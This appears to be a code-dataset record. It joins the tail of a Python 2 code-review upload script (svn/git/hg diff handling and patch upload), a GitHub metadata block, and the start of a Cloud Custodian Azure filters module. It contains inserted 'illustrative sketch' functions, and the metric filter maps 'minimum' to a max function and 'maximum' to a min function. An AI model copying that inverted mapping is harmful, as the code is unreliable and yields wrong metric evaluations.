mimetype, returncode = RunShellWithReturnCode(cmd)
if returncode:
# File does not exist in the requested revision.
# Reset mimetype, it contains an error message.
mimetype = ""
get_base = False
is_binary = bool(mimetype) and not mimetype.startswith("text/")
if status[0] == " ":
# Empty base content just to force an upload.
base_content = ""
elif is_binary:
if self.IsImage(filename):
get_base = True
if status[0] == "M":
if not self.rev_end:
new_content = self.ReadFile(filename)
else:
url = "%s/%s@%s" % (self.svn_base, filename, self.rev_end)
new_content = RunShell(["svn", "cat", url],
universal_newlines=True, silent_ok=True)
else:
base_content = ""
else:
get_base = True
if get_base:
if is_binary:
universal_newlines = False
else:
universal_newlines = True
if self.rev_start:
# "svn cat -r REV delete_file.txt" doesn't work. cat requires
# the full URL with "@REV" appended instead of using "-r" option.
url = "%s/%s@%s" % (self.svn_base, filename, self.rev_start)
base_content = RunShell(["svn", "cat", url],
universal_newlines=universal_newlines,
silent_ok=True)
else:
base_content, ret_code = RunShellWithReturnCode(
["svn", "cat", filename], universal_newlines=universal_newlines)
if ret_code and status[0] == "R":
# It's a replaced file without local history (see issue208).
# The base file needs to be fetched from the server.
url = "%s/%s" % (self.svn_base, filename)
base_content = RunShell(["svn", "cat", url],
universal_newlines=universal_newlines,
silent_ok=True)
elif ret_code:
ErrorExit("Got error status from 'svn cat %s'", filename)
if not is_binary:
args = []
if self.rev_start:
url = "%s/%s@%s" % (self.svn_base, filename, self.rev_start)
else:
url = filename
args += ["-r", "BASE"]
cmd = ["svn"] + args + ["propget", "svn:keywords", url]
keywords, returncode = RunShellWithReturnCode(cmd)
if keywords and not returncode:
base_content = self._CollapseKeywords(base_content, keywords)
else:
StatusUpdate("svn status returned unexpected output: %s" % status)
sys.exit(1)
return base_content, new_content, is_binary, status[0:5]
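# Illustrative sketch (not part of the original script): a standalone version
# of the simple (non fixed-length) keyword collapsing that _CollapseKeywords
# performs above. The sample content is made up.
def _ExampleCollapseKeywords():
  content = "# $Id: foo.py 123 2010-01-01 author $\n"
  collapsed = re.sub(r"\$(Id):(:?)([^\$]+)\$",
                     lambda m: "$%s$" % m.group(1), content)
  # collapsed is now "# $Id$\n", matching what "svn diff" emits for files
  # that have svn:keywords set.
  return collapsed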
class GitVCS(VersionControlSystem):
"""Implementation of the VersionControlSystem interface for Git."""
def __init__(self, options):
super(GitVCS, self).__init__(options)
# Map of filename -> (hash before, hash after) of base file.
# Hashes for "no such file" are represented as None.
self.hashes = {}
# Map of new filename -> old filename for renames.
self.renames = {}
def PostProcessDiff(self, gitdiff):
"""Converts the diff output to include an svn-style "Index:" line as well
as record the hashes of the files, so we can upload them along with our
diff."""
    # Special hash used by git to indicate "no such content".
NULL_HASH = "0"*40
def IsFileNew(filename):
return filename in self.hashes and self.hashes[filename][0] is None
def AddSubversionPropertyChange(filename):
"""Add svn's property change information into the patch if given file is
new file.
We use Subversion's auto-props setting to retrieve its property.
See http://svnbook.red-bean.com/en/1.1/ch07.html#svn-ch-7-sect-1.3.2 for
Subversion's [auto-props] setting.
"""
if self.options.emulate_svn_auto_props and IsFileNew(filename):
svnprops = GetSubversionPropertyChanges(filename)
if svnprops:
svndiff.append("\n" + svnprops + "\n")
svndiff = []
filecount = 0
filename = None
for line in gitdiff.splitlines():
match = re.match(r"diff --git a/(.*) b/(.*)$", line)
if match:
# Add auto property here for previously seen file.
if filename is not None:
AddSubversionPropertyChange(filename)
filecount += 1
# Intentionally use the "after" filename so we can show renames.
filename = match.group(2)
svndiff.append("Index: %s\n" % filename)
if match.group(1) != match.group(2):
self.renames[match.group(2)] = match.group(1)
else:
# The "index" line in a git diff looks like this (long hashes elided):
# index 82c0d44..b2cee3f 100755
# We want to save the left hash, as that identifies the base file.
match = re.match(r"index (\w+)\.\.(\w+)", line)
if match:
before, after = (match.group(1), match.group(2))
if before == NULL_HASH:
before = None
if after == NULL_HASH:
after = None
self.hashes[filename] = (before, after)
svndiff.append(line + "\n")
if not filecount:
ErrorExit("No valid patches found in output from git diff")
# Add auto property for the last seen file.
assert filename is not None
AddSubversionPropertyChange(filename)
return "".join(svndiff)
def GenerateDiff(self, extra_args):
extra_args = extra_args[:]
if self.options.revision:
extra_args = [self.options.revision] + extra_args
# --no-ext-diff is broken in some versions of Git, so try to work around
# this by overriding the environment (but there is still a problem if the
# git config key "diff.external" is used).
env = os.environ.copy()
if 'GIT_EXTERNAL_DIFF' in env: del env['GIT_EXTERNAL_DIFF']
return RunShell(["git", "diff", "--no-ext-diff", "--full-index", "-M"]
+ extra_args, env=env)
def GetUnknownFiles(self):
status = RunShell(["git", "ls-files", "--exclude-standard", "--others"],
silent_ok=True)
return status.splitlines()
def GetFileContent(self, file_hash, is_binary):
"""Returns the content of a file identified by its git hash."""
data, retcode = RunShellWithReturnCode(["git", "show", file_hash],
universal_newlines=not is_binary)
if retcode:
ErrorExit("Got error status from 'git show %s'" % file_hash)
return data
def GetBaseFile(self, filename):
hash_before, hash_after = self.hashes.get(filename, (None,None))
base_content = None
new_content = None
is_binary = self.IsBinary(filename)
status = None
if filename in self.renames:
status = "A +" # Match svn attribute name for renames.
if filename not in self.hashes:
# If a rename doesn't change the content, we never get a hash.
base_content = RunShell(["git", "show", "HEAD:" + filename])
elif not hash_before:
status = "A"
base_content = ""
elif not hash_after:
status = "D"
else:
status = "M"
is_image = self.IsImage(filename)
# Grab the before/after content if we need it.
# We should include file contents if it's text or it's an image.
if not is_binary or is_image:
# Grab the base content if we don't have it already.
if base_content is None and hash_before:
base_content = self.GetFileContent(hash_before, is_binary)
# Only include the "after" file if it's an image; otherwise it
# it is reconstructed from the diff.
if is_image and hash_after:
new_content = self.GetFileContent(hash_after, is_binary)
return (base_content, new_content, is_binary, status)
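# Illustrative sketch (not part of the original script): how the "index" line
# of a git diff is parsed into (before, after) blob hashes, mirroring
# GitVCS.PostProcessDiff above. The short hashes are made up.
def _ExampleParseGitIndexLine():
  line = "index 82c0d44..b2cee3f 100755"
  match = re.match(r"index (\w+)\.\.(\w+)", line)
  # Returns ("82c0d44", "b2cee3f"); an all-zero hash would be mapped to None
  # by PostProcessDiff to mean "no such content".
  return match.group(1), match.group(2)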
class MercurialVCS(VersionControlSystem):
"""Implementation of the VersionControlSystem interface for Mercurial."""
def __init__(self, options, repo_dir):
super(MercurialVCS, self).__init__(options)
# Absolute path to repository (we can be in a subdir)
self.repo_dir = os.path.normpath(repo_dir)
# Compute the subdir
cwd = os.path.normpath(os.getcwd())
assert cwd.startswith(self.repo_dir)
self.subdir = cwd[len(self.repo_dir):].lstrip(r"\/")
if self.options.revision:
self.base_rev = self.options.revision
else:
self.base_rev = RunShell(["hg", "parent", "-q"]).split(':')[1].strip()
def _GetRelPath(self, filename):
"""Get relative path of a file according to the current directory,
given its logical path in the repo."""
assert filename.startswith(self.subdir), (filename, self.subdir)
return filename[len(self.subdir):].lstrip(r"\/")
def GenerateDiff(self, extra_args):
# If no file specified, restrict to the current subdir
extra_args = extra_args or ["."]
cmd = ["hg", "diff", "--git", "-r", self.base_rev] + extra_args
data = RunShell(cmd, silent_ok=True)
svndiff = []
filecount = 0
for line in data.splitlines():
m = re.match("diff --git a/(\S+) b/(\S+)", line)
if m:
# Modify line to make it look like as it comes from svn diff.
# With this modification no changes on the server side are required
# to make upload.py work with Mercurial repos.
# NOTE: for proper handling of moved/copied files, we have to use
# the second filename.
filename = m.group(2)
svndiff.append("Index: %s" % filename)
svndiff.append("=" * 67)
filecount += 1
logging.info(line)
else:
svndiff.append(line)
if not filecount:
ErrorExit("No valid patches found in output from hg diff")
return "\n".join(svndiff) + "\n"
def GetUnknownFiles(self):
"""Return a list of files unknown to the VCS."""
args = []
status = RunShell(["hg", "status", "--rev", self.base_rev, "-u", "."],
silent_ok=True)
unknown_files = []
for line in status.splitlines():
st, fn = line.split(" ", 1)
if st == "?":
unknown_files.append(fn)
return unknown_files
def GetBaseFile(self, filename):
# "hg status" and "hg cat" both take a path relative to the current subdir
# rather than to the repo root, but "hg diff" has given us the full path
# to the repo root.
base_content = ""
new_content = None
is_binary = False
oldrelpath = relpath = self._GetRelPath(filename)
# "hg status -C" returns two lines for moved/copied files, one otherwise
out = RunShell(["hg", "status", "-C", "--rev", self.base_rev, relpath])
out = out.splitlines()
# HACK: strip error message about missing file/directory if it isn't in
# the working copy
if out[0].startswith('%s: ' % relpath):
out = out[1:]
if len(out) > 1:
# Moved/copied => considered as modified, use old filename to
# retrieve base contents
oldrelpath = out[1].strip()
status = "M"
else:
status, _ = out[0].split(' ', 1)
if ":" in self.base_rev:
base_rev = self.base_rev.split(":", 1)[0]
else:
base_rev = self.base_rev
if status != "A":
base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
silent_ok=True)
is_binary = "\0" in base_content # Mercurial's heuristic
if status != "R":
new_content = open(relpath, "rb").read()
is_binary = is_binary or "\0" in new_content
if is_binary and base_content:
# Fetch again without converting newlines
base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
silent_ok=True, universal_newlines=False)
if not is_binary or not self.IsImage(relpath):
new_content = None
return base_content, new_content, is_binary, status
# NOTE: The SplitPatch function is duplicated in engine.py, keep them in sync.
def SplitPatch(data):
"""Splits a patch into separate pieces for each file.
Args:
data: A string containing the output of svn diff.
Returns:
A list of 2-tuple (filename, text) where text is the svn diff output
pertaining to filename.
"""
patches = []
filename = None
diff = []
for line in data.splitlines(True):
new_filename = None
if line.startswith('Index:'):
unused, new_filename = line.split(':', 1)
new_filename = new_filename.strip()
elif line.startswith('Property changes on:'):
unused, temp_filename = line.split(':', 1)
# When a file is modified, paths use '/' between directories, however
# when a property is modified '\' is used on Windows. Make them the same
# otherwise the file shows up twice.
temp_filename = temp_filename.strip().replace('\\', '/')
if temp_filename != filename:
# File has property changes but no modifications, create a new diff.
new_filename = temp_filename
if new_filename:
if filename and diff:
patches.append((filename, ''.join(diff)))
filename = new_filename
diff = [line]
continue
if diff is not None:
diff.append(line)
if filename and diff:
patches.append((filename, ''.join(diff)))
return patches
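# Illustrative sketch (not part of the original script): what SplitPatch
# produces for a minimal, hand-written svn-style diff. The sample text is
# made up for illustration only.
def _ExampleSplitPatch():
  sample_diff = (
    "Index: foo.py\n"
    "===================================================================\n"
    "--- foo.py\t(revision 1)\n"
    "+++ foo.py\t(working copy)\n"
    "@@ -1 +1 @@\n"
    "-old\n"
    "+new\n"
  )
  # Expected result: [("foo.py", <the full diff text above>)]
  return SplitPatch(sample_diff)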
def UploadSeparatePatches(issue, rpc_server, patchset, data, options):
"""Uploads a separate patch for each file in the diff output.
Returns a list of [patch_key, filename] for each file.
"""
patches = SplitPatch(data)
rv = []
for patch in patches:
if len(patch[1]) > MAX_UPLOAD_SIZE:
print ("Not uploading the patch for " + patch[0] +
" because the file is too large.")
continue
form_fields = [("filename", patch[0])]
if not options.download_base:
form_fields.append(("content_upload", "1"))
files = [("data", "data.diff", patch[1])]
ctype, body = EncodeMultipartFormData(form_fields, files)
url = "/%d/upload_patch/%d" % (int(issue), int(patchset))
print "Uploading patch for " + patch[0]
response_body = rpc_server.Send(url, body, content_type=ctype)
lines = response_body.splitlines()
if not lines or lines[0] != "OK":
StatusUpdate(" --> %s" % response_body)
sys.exit(1)
rv.append([lines[1], patch[0]])
return rv
def GuessVCSName():
"""Helper to guess the version control system.
  This examines the current directory, guesses which VersionControlSystem
  we're using, and returns a string indicating which VCS was detected.
Returns:
A pair (vcs, output). vcs is a string indicating which VCS was detected
and is one of VCS_GIT, VCS_MERCURIAL, VCS_SUBVERSION, or VCS_UNKNOWN.
output is a string containing any interesting output from the vcs
detection routine, or None if there is nothing interesting.
"""
# Mercurial has a command to get the base directory of a repository
# Try running it, but don't die if we don't have hg installed.
# NOTE: we try Mercurial first as it can sit on top of an SVN working copy.
try:
out, returncode = RunShellWithReturnCode(["hg", "root"])
if returncode == 0:
return (VCS_MERCURIAL, out.strip())
except OSError, (errno, message):
if errno != 2: # ENOENT -- they don't have hg installed.
raise
# Subversion has a .svn in all working directories.
if os.path.isdir('.svn'):
logging.info("Guessed VCS = Subversion")
return (VCS_SUBVERSION, None)
# Git has a command to test if you're in a git tree.
# Try running it, but don't die if we don't have git installed.
try:
out, returncode = RunShellWithReturnCode(["git", "rev-parse",
"--is-inside-work-tree"])
if returncode == 0:
return (VCS_GIT, None)
except OSError, (errno, message):
if errno != 2: # ENOENT -- they don't have git installed.
raise
return (VCS_UNKNOWN, None)
def GuessVCS(options):
"""Helper to guess the version control system.
This verifies any user-specified VersionControlSystem (by command line
or environment variable). If the user didn't specify one, this examines
the current directory, guesses which VersionControlSystem we're using,
and returns an instance of the appropriate class. Exit with an error
if we can't figure it out.
Returns:
A VersionControlSystem instance. Exits if the VCS can't be guessed.
"""
vcs = options.vcs
if not vcs:
vcs = os.environ.get("CODEREVIEW_VCS")
if vcs:
v = VCS_ABBREVIATIONS.get(vcs.lower())
if v is None:
ErrorExit("Unknown version control system %r specified." % vcs)
(vcs, extra_output) = (v, None)
else:
(vcs, extra_output) = GuessVCSName()
if vcs == VCS_MERCURIAL:
if extra_output is None:
extra_output = RunShell(["hg", "root"]).strip()
return MercurialVCS(options, extra_output)
elif vcs == VCS_SUBVERSION:
return SubversionVCS(options)
elif vcs == VCS_GIT:
return GitVCS(options)
ErrorExit(("Could not guess version control system. "
"Are you in a working copy directory?"))
def CheckReviewer(reviewer):
"""Validate a reviewer -- either a nickname or an email addres.
Args:
reviewer: A nickname or an email address.
Calls ErrorExit() if it is an invalid email address.
"""
if "@" not in reviewer:
return # Assume nickname
parts = reviewer.split("@")
if len(parts) > 2:
ErrorExit("Invalid email address: %r" % reviewer)
assert len(parts) == 2
if "." not in parts[1]:
ErrorExit("Invalid email address: %r" % reviewer)
def LoadSubversionAutoProperties():
"""Returns the content of [auto-props] section of Subversion's config file as
a dictionary.
Returns:
A dictionary whose key-value pair corresponds the [auto-props] section's
key-value pair.
In following cases, returns empty dictionary:
- config file doesn't exist, or
- 'enable-auto-props' is not set to 'true-like-value' in [miscellany].
"""
  # TODO(hayato): Windows users might use a different path for the configuration file.
subversion_config = os.path.expanduser("~/.subversion/config")
if not os.path.exists(subversion_config):
return {}
config = ConfigParser.ConfigParser()
config.read(subversion_config)
if (config.has_section("miscellany") and
config.has_option("miscellany", "enable-auto-props") and
config.getboolean("miscellany", "enable-auto-props") and
config.has_section("auto-props")):
props = {}
for file_pattern in config.options("auto-props"):
props[file_pattern] = ParseSubversionPropertyValues(
config.get("auto-props", file_pattern))
return props
else:
return {}
def ParseSubversionPropertyValues(props):
"""Parse the given property value which comes from [auto-props] section and
returns a list whose element is a (svn_prop_key, svn_prop_value) pair.
See the following doctest for example.
>>> ParseSubversionPropertyValues('svn:eol-style=LF')
[('svn:eol-style', 'LF')]
>>> ParseSubversionPropertyValues('svn:mime-type=image/jpeg')
[('svn:mime-type', 'image/jpeg')]
>>> ParseSubversionPropertyValues('svn:eol-style=LF;svn:executable')
[('svn:eol-style', 'LF'), ('svn:executable', '*')]
"""
key_value_pairs = []
for prop in props.split(";"):
key_value = prop.split("=")
assert len(key_value) <= 2
if len(key_value) == 1:
# If value is not given, use '*' as a Subversion's convention.
key_value_pairs.append((key_value[0], "*"))
else:
key_value_pairs.append((key_value[0], key_value[1]))
return key_value_pairs
def GetSubversionPropertyChanges(filename):
"""Return a Subversion's 'Property changes on ...' string, which is used in
the patch file.
Args:
filename: filename whose property might be set by [auto-props] config.
Returns:
    A string like 'Property changes on |filename| ...' if the given |filename|
    matches any entries in the [auto-props] section; None otherwise.
"""
global svn_auto_props_map
if svn_auto_props_map is None:
svn_auto_props_map = LoadSubversionAutoProperties()
all_props = []
for file_pattern, props in svn_auto_props_map.items():
if fnmatch.fnmatch(filename, file_pattern):
all_props.extend(props)
if all_props:
return FormatSubversionPropertyChanges(filename, all_props)
return None
def FormatSubversionPropertyChanges(filename, props):
"""Returns Subversion's 'Property changes on ...' strings using given filename
and properties.
Args:
filename: filename
props: A list whose element is a (svn_prop_key, svn_prop_value) pair.
Returns:
A string which can be used in the patch file for Subversion.
See the following doctest for example.
>>> print FormatSubversionPropertyChanges('foo.cc', [('svn:eol-style', 'LF')])
Property changes on: foo.cc
___________________________________________________________________
Added: svn:eol-style
+ LF
<BLANKLINE>
"""
prop_changes_lines = [
"Property changes on: %s" % filename,
"___________________________________________________________________"]
for key, value in props:
prop_changes_lines.append("Added: " + key)
prop_changes_lines.append(" + " + value)
return "\n".join(prop_changes_lines) + "\n"
def RealMain(argv, data=None):
"""The real main function.
Args:
argv: Command line arguments.
data: Diff contents. If None (default) the diff is generated by
the VersionControlSystem implementation returned by GuessVCS().
Returns:
A 2-tuple (issue id, patchset id).
The patchset id is None if the base files are not uploaded by this
script (applies only to SVN checkouts).
"""
logging.basicConfig(format=("%(asctime).19s %(levelname)s %(filename)s:"
"%(lineno)s %(message)s "))
os.environ['LC_ALL'] = 'C'
options, args = parser.parse_args(argv[1:])
global verbosity
verbosity = options.verbose
if verbosity >= 3:
logging.getLogger().setLevel(logging.DEBUG)
elif verbosity >= 2:
logging.getLogger().setLevel(logging.INFO)
vcs = GuessVCS(options)
base = options.base_url
if isinstance(vcs, SubversionVCS):
# Guessing the base field is only supported for Subversion.
# Note: Fetching base files may become deprecated in future releases.
guessed_base = vcs.GuessBase(options.download_base)
if base:
if guessed_base and base != guessed_base:
print "Using base URL \"%s\" from --base_url instead of \"%s\"" % \
(base, guessed_base)
else:
base = guessed_base
if not base and options.download_base:
options.download_base = True
logging.info("Enabled upload of base file")
if not options.assume_yes:
vcs.CheckForUnknownFiles()
if data is None:
data = vcs.GenerateDiff(args)
data = vcs.PostProcessDiff(data)
files = vcs.GetBaseFiles(data)
if verbosity >= 1:
print "Upload server:", options.server, "(change with -s/--server)"
if options.issue:
prompt = "Message describing this patch set: "
else:
prompt = "New issue subject: "
message = options.message or raw_input(prompt).strip()
if not message:
ErrorExit("A non-empty message is required")
rpc_server = GetRpcServer(options.server,
options.email,
options.host,
options.save_cookies,
options.account_type)
form_fields = [("subject", message)]
if base:
form_fields.append(("base", base))
if options.issue:
form_fields.append(("issue", str(options.issue)))
if options.email:
form_fields.append(("user", options.email))
if options.reviewers:
for reviewer in options.reviewers.split(','):
CheckReviewer(reviewer)
form_fields.append(("reviewers", options.reviewers))
if options.cc:
for cc in options.cc.split(','):
CheckReviewer(cc)
form_fields.append(("cc", options.cc))
description = options.description
if options.description_file:
if options.description:
ErrorExit("Can't specify description and description_file")
file = open(options.description_file, 'r')
description = file.read()
file.close()
if description:
form_fields.append(("description", description))
  # Send a hash of all the base files so the server can determine if a copy
# already exists in an earlier patchset.
base_hashes = ""
for file, info in files.iteritems():
if not info[0] is None:
checksum = md5(info[0]).hexdigest()
if base_hashes:
base_hashes += "|"
base_hashes += checksum + ":" + file
form_fields.append(("base_hashes", base_hashes))
if options.private:
if options.issue:
print "Warning: Private flag ignored when updating an existing issue."
else:
form_fields.append(("private", "1"))
# If we're uploading base files, don't send the email before the uploads, so
# that it contains the file status.
if options.send_mail and options.download_base:
form_fields.append(("send_mail", "1"))
if not options.download_base:
form_fields.append(("content_upload", "1"))
if len(data) > MAX_UPLOAD_SIZE:
print "Patch is large, so uploading file patches separately."
uploaded_diff_file = []
form_fields.append(("separate_patches", "1"))
else:
uploaded_diff_file = [("data", "data.diff", data)]
ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
response_body = rpc_server.Send("/upload", body, content_type=ctype)
patchset = None
if not options.download_base or not uploaded_diff_file:
lines = response_body.splitlines()
if len(lines) >= 2:
msg = lines[0]
patchset = lines[1].strip()
patches = [x.split(" ", 1) for x in lines[2:]]
else:
msg = response_body
else:
msg = response_body
StatusUpdate(msg)
if not response_body.startswith("Issue created.") and \
not response_body.startswith("Issue updated."):
sys.exit(0)
issue = msg[msg.rfind("/")+1:]
if not uploaded_diff_file:
result = UploadSeparatePatches(issue, rpc_server, patchset, data, options)
if not options.download_base:
patches = result
if not options.download_base:
vcs.UploadBaseFiles(issue, rpc_server, patches, patchset, options, files)
if options.send_mail:
rpc_server.Send("/" + issue + "/mail", payload="")
return issue, patchset
def main():
try:
RealMain(sys.argv)
except KeyboardInterrupt:
print
StatusUpdate("Interrupted.")
sys.exit(1)
if __name__ == "__main__":
main()
| {
"content_hash": "8d188ba4064e8a9c66995d8adbdbb9fe",
"timestamp": "",
"source": "github",
"line_count": 1758,
"max_line_length": 80,
"avg_line_length": 37.0358361774744,
"alnum_prop": 0.6240304719777604,
"repo_name": "stori-es/stori_es",
"id": "ff0657b83d2e83d9b2848c6c11d3e0ba94a492aa",
"size": "65709",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "upload.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "881308"
},
{
"name": "Gherkin",
"bytes": "32367"
},
{
"name": "HTML",
"bytes": "23540"
},
{
"name": "Java",
"bytes": "4906774"
},
{
"name": "JavaScript",
"bytes": "656583"
},
{
"name": "PLpgSQL",
"bytes": "4417"
},
{
"name": "Python",
"bytes": "65709"
},
{
"name": "SQLPL",
"bytes": "83603"
},
{
"name": "Shell",
"bytes": "110846"
}
],
"symlink_target": ""
} |
import logging
import isodate
import operator
from abc import ABCMeta, abstractmethod
from concurrent.futures import as_completed
from datetime import timedelta
import six
from azure.mgmt.costmanagement.models import (QueryAggregation,
QueryComparisonExpression,
QueryDataset, QueryDefinition,
QueryFilter, QueryGrouping,
QueryTimePeriod, TimeframeType)
from azure.mgmt.policyinsights import PolicyInsightsClient
from c7n_azure.tags import TagHelper
from c7n_azure.utils import (IpRangeHelper, Math, ResourceIdParser,
StringUtils, ThreadHelper, now, utcnow, is_resource_group)
from dateutil.parser import parse
from msrest.exceptions import HttpOperationError
from c7n.filters import Filter, FilterValidationError, ValueFilter
from c7n.filters.core import PolicyValidationError
from c7n.filters.offhours import OffHour, OnHour, Time
from c7n.utils import chunks, get_annotation_prefix, type_schema
scalar_ops = {
'eq': operator.eq,
'equal': operator.eq,
'ne': operator.ne,
'not-equal': operator.ne,
'gt': operator.gt,
'greater-than': operator.gt,
'ge': operator.ge,
'gte': operator.ge,
'le': operator.le,
'lte': operator.le,
'lt': operator.lt,
'less-than': operator.lt
}
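# Illustrative sketch (not part of the original module): each op name maps to
# an operator-module callable, e.g. scalar_ops['gt'](80, 75) is True. The
# filters below use this table to compare an aggregated value to a threshold.
def _example_scalar_op(op='gt', value=80, threshold=75):
    return scalar_ops[op](value, threshold)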
class MetricFilter(Filter):
"""
    Filters Azure resources based on live metrics from Azure Monitor.
Click `here
<https://docs.microsoft.com/en-us/azure/monitoring-and-diagnostics/monitoring-supported-metrics/>`_
for a full list of metrics supported by Azure resources.
:example:
Find all VMs with an average Percentage CPU greater than 75% over last 2 hours
.. code-block:: yaml
policies:
- name: vm-percentage-cpu
resource: azure.vm
filters:
- type: metric
metric: Percentage CPU
aggregation: average
op: gt
threshold: 75
timeframe: 2
:example:
Find KeyVaults with more than 1000 API hits in the last hour
.. code-block:: yaml
policies:
- name: keyvault-hits
resource: azure.keyvault
filters:
- type: metric
metric: ServiceApiHit
aggregation: total
op: gt
threshold: 1000
timeframe: 1
:example:
Find SQL servers with less than 10% average DTU consumption
across all databases over last 24 hours
.. code-block:: yaml
policies:
- name: dtu-consumption
resource: azure.sqlserver
filters:
- type: metric
metric: dtu_consumption_percent
aggregation: average
op: lt
threshold: 10
timeframe: 24
filter: "DatabaseResourceId eq '*'"
"""
DEFAULT_TIMEFRAME = 24
DEFAULT_INTERVAL = 'P1D'
DEFAULT_AGGREGATION = 'average'
aggregation_funcs = {
'average': Math.mean,
'total': Math.sum,
'count': Math.sum,
'minimum': Math.max,
'maximum': Math.min
}
schema = {
'type': 'object',
'required': ['type', 'metric', 'op', 'threshold'],
'additionalProperties': False,
'properties': {
'type': {'enum': ['metric']},
'metric': {'type': 'string'},
'op': {'enum': list(scalar_ops.keys())},
'threshold': {'type': 'number'},
'timeframe': {'type': 'number'},
'interval': {'enum': [
'PT1M', 'PT5M', 'PT15M', 'PT30M', 'PT1H', 'PT6H', 'PT12H', 'P1D']},
'aggregation': {'enum': ['total', 'average', 'count', 'minimum', 'maximum']},
'no_data_action': {'enum': ['include', 'exclude']},
'filter': {'type': 'string'}
}
}
schema_alias = True
def __init__(self, data, manager=None):
super(MetricFilter, self).__init__(data, manager)
# Metric name as defined by Azure SDK
self.metric = self.data.get('metric')
# gt (>), ge (>=), eq (==), le (<=), lt (<)
self.op = scalar_ops[self.data.get('op')]
# Value to compare metric value with self.op
self.threshold = self.data.get('threshold')
# Number of hours from current UTC time
self.timeframe = float(self.data.get('timeframe', self.DEFAULT_TIMEFRAME))
# Interval as defined by Azure SDK
self.interval = isodate.parse_duration(self.data.get('interval', self.DEFAULT_INTERVAL))
# Aggregation as defined by Azure SDK
self.aggregation = self.data.get('aggregation', self.DEFAULT_AGGREGATION)
# Aggregation function to be used locally
self.func = self.aggregation_funcs[self.aggregation]
# Used to reduce the set of metric data returned
self.filter = self.data.get('filter', None)
# Include or exclude resources if there is no metric data available
self.no_data_action = self.data.get('no_data_action', 'exclude')
def process(self, resources, event=None):
# Import utcnow function as it may have been overridden for testing purposes
from c7n_azure.utils import utcnow
# Get timespan
end_time = utcnow()
start_time = end_time - timedelta(hours=self.timeframe)
self.timespan = "{}/{}".format(start_time, end_time)
# Create Azure Monitor client
self.client = self.manager.get_client('azure.mgmt.monitor.MonitorManagementClient')
# Process each resource in a separate thread, returning all that pass filter
with self.executor_factory(max_workers=3) as w:
processed = list(w.map(self.process_resource, resources))
return [item for item in processed if item is not None]
def get_metric_data(self, resource):
cached_metric_data = self._get_cached_metric_data(resource)
if cached_metric_data:
return cached_metric_data['measurement']
try:
metrics_data = self.client.metrics.list(
self.get_resource_id(resource),
timespan=self.timespan,
interval=self.interval,
metricnames=self.metric,
aggregation=self.aggregation,
filter=self.get_filter(resource)
)
except HttpOperationError:
self.log.exception("Could not get metric: %s on %s" % (
self.metric, resource['id']))
return None
if len(metrics_data.value) > 0 and len(metrics_data.value[0].timeseries) > 0:
m = [getattr(item, self.aggregation)
for item in metrics_data.value[0].timeseries[0].data]
else:
m = None
self._write_metric_to_resource(resource, metrics_data, m)
return m
def get_resource_id(self, resource):
return resource['id']
def get_filter(self, resource):
return self.filter
def _write_metric_to_resource(self, resource, metrics_data, m):
resource_metrics = resource.setdefault(get_annotation_prefix('metrics'), {})
resource_metrics[self._get_metrics_cache_key()] = {
'metrics_data': metrics_data.as_dict(),
'measurement': m,
}
def _get_metrics_cache_key(self):
return "{}, {}, {}, {}, {}".format(
self.metric,
self.aggregation,
self.timeframe,
self.interval,
self.filter,
)
def _get_cached_metric_data(self, resource):
metrics = resource.get(get_annotation_prefix('metrics'))
if not metrics:
return None
return metrics.get(self._get_metrics_cache_key())
def passes_op_filter(self, resource):
m_data = self.get_metric_data(resource)
if m_data is None:
return self.no_data_action == 'include'
aggregate_value = self.func(m_data)
return self.op(aggregate_value, self.threshold)
def process_resource(self, resource):
return resource if self.passes_op_filter(resource) else None
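# Illustrative sketch (made-up sample values): how MetricFilter combines the
# per-interval data points returned by Azure Monitor. With
# 'aggregation: average' the local function is Math.mean, so CPU samples of
# [70, 80, 90] against 'op: gt, threshold: 75' match because the mean is 80.
def _example_metric_threshold_check(samples=(70, 80, 90), threshold=75):
    aggregate = sum(samples) / float(len(samples))
    return scalar_ops['gt'](aggregate, threshold)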
DEFAULT_TAG = "custodian_status"
class TagActionFilter(Filter):
"""Filter resources for tag specified future action
Filters resources by a 'custodian_status' tag which specifies a future
date for an action.
The filter parses the tag values looking for an 'op@date'
    string. The date is parsed and compared to today's date; the filter
    succeeds if today's date is greater than or equal to the target date.
The optional 'skew' parameter provides for incrementing today's
date a number of days into the future. An example use case might
be sending a final notice email a few days before terminating an
instance, or snapshotting a volume prior to deletion.
The optional 'skew_hours' parameter provides for incrementing the current
time a number of hours into the future.
    Optionally, the 'tz' parameter can be used to specify the timezone
in which to interpret the clock (default value is 'utc')
:example:
.. code-block :: yaml
policies:
- name: vm-stop-marked
resource: azure.vm
filters:
- type: marked-for-op
# The default tag used is custodian_status
# but that is configurable
tag: custodian_status
op: stop
              # Other optional parameters include skew, skew_hours and tz
tz: utc
"""
schema = type_schema(
'marked-for-op',
tag={'type': 'string'},
tz={'type': 'string'},
skew={'type': 'number', 'minimum': 0},
skew_hours={'type': 'number', 'minimum': 0},
op={'type': 'string'})
schema_alias = True
current_date = None
log = logging.getLogger('custodian.azure.filters.TagActionFilter')
def validate(self):
op = self.data.get('op')
if self.manager and op not in self.manager.action_registry.keys():
raise PolicyValidationError(
"Invalid marked-for-op op:%s in %s" % (op, self.manager.data))
tz = Time.get_tz(self.data.get('tz', 'utc'))
if not tz:
raise PolicyValidationError(
"Invalid timezone specified '%s' in %s" % (
self.data.get('tz'), self.manager.data))
return self
def process(self, resources, event=None):
self.tag = self.data.get('tag', DEFAULT_TAG)
self.op = self.data.get('op', 'stop')
self.skew = self.data.get('skew', 0)
self.skew_hours = self.data.get('skew_hours', 0)
self.tz = Time.get_tz(self.data.get('tz', 'utc'))
return super(TagActionFilter, self).process(resources, event)
def __call__(self, i):
v = i.get('tags', {}).get(self.tag, None)
if v is None:
return False
if ':' not in v or '@' not in v:
return False
msg, tgt = v.rsplit(':', 1)
action, action_date_str = tgt.strip().split('@', 1)
if action != self.op:
return False
try:
action_date = parse(action_date_str)
except Exception:
self.log.error("could not parse tag:%s value:%s on %s" % (
self.tag, v, i['InstanceId']))
return False
# current_date must match timezones with the parsed date string
if action_date.tzinfo:
action_date = action_date.astimezone(self.tz)
current_date = now(tz=self.tz)
else:
current_date = now()
return current_date >= (
action_date - timedelta(days=self.skew, hours=self.skew_hours))
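# Illustrative sketch (made-up tag value): the 'custodian_status' tag value
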